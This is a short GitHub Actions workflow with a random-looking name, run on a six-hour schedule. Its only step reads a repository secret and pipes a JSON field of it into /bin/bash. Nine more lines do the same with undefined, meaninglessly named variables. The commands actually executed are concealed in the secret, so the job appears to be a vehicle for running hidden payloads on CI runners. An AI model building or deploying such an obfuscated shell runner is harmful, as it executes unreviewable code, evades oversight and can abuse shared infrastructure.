name: yanxiaosan1829
on:
  workflow_dispatch:
  schedule:
    - cron: '7 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yanxiaosan1829
        env:
          u020: ${{ secrets.u020 }}
        run: |
          echo $u020 | jq -r .hama45 | /bin/bash
          echo $k79161 | jq -r .dwd82992 | /bin/bash
          echo $o25 | jq -r .u42124 | /bin/bash
          echo $kbi3214 | jq -r .eui926 | /bin/bash
          echo $qfnsr1120 | jq -r .yxuu933 | /bin/bash
          echo $wj87 | jq -r .ig4113 | /bin/bash
          echo $ifjci28919 | jq -r .daazu6051 | /bin/bash
          echo $jko6260 | jq -r .mkhhf040 | /bin/bash
          echo $qjpyr29890 | jq -r .ywjh19091 | /bin/bash
          echo $u4175 | jq -r .mpkwu740 | /bin/bash

